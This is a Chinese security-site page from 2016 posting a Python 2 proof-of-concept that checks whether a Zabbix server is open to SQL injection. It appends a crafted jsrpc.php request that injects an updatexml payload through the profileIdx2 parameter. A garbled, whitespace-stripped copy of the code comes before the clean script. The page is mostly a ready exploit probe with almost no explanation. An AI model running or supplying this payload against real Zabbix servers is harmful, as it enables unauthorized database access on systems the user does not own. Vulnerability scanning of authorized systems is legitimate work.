安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 神兵利刃 > zabbix(sql注入判断脚本)

zabbix(sql注入判断脚本)

时间:2016-08-18来源:未知 作者:安云网点击:
#-*-coding:utf-8-*-#codebyanyun.orgimporturllibimportredefgetHtml(url):page=urllib.urlopen(url)html=page.read()html=html.replace(\n,)html=html.replace(,)html=html.replace(,)html=html.replace(,)returnhtmlurl=raw_input(enterurl:)poc=jsrpc.php?type=9method=s
#-*-coding:utf-8-*-
# code by anyun.org
import urllib
import re
 
def getHtml(url):
    page = urllib.urlopen(url)
    html = page.read()
    html = html.replace('\n', '')
    html = html.replace('       ', ' ')
    html = html.replace('   ', '')
    html = html.replace('   ', '')
    return html
 
url =raw_input('enter url:')
poc='jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&\
pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23\
&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17'
new_url=url+poc
try:
    if getHtml(new_url).find('flickerfreescreen')<>0:
        print 'maybe successeed'
    else:
        print 'maybe unsuccessed'
except:
    print 'http error?' 
//内容来自AnYun.ORG


//安云网咨询系统

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容